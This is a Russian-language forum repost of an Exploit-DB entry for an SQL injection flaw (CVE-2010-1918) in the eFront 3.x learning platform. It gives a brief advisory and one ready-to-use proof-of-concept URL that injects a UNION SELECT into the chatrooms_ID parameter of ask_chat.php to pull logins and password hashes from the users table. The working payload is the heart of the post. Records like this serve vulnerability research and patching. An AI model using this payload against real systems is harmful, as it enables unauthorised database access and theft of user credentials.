Exploit eFront 3.x - 'ask_chat.php' SQL Injection

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
33969
Проверка EDB
  1. Пройдено
Автор
STEFAN ESSER
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2010-1918
Дата публикации
2010-05-09
Код:
source: https://www.securityfocus.com/bid/40032/info

eFront is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

eFront 3.6.2 and prior versions are vulnerable. 

http://www.example.com/www/ask_chat.php?chatrooms_ID=0%20UNION%20select%20concat%28login,0x2e,password%29,1,1,1,1%20from%20users%20--%20x
 
Источник
www.exploit-db.com

Похожие темы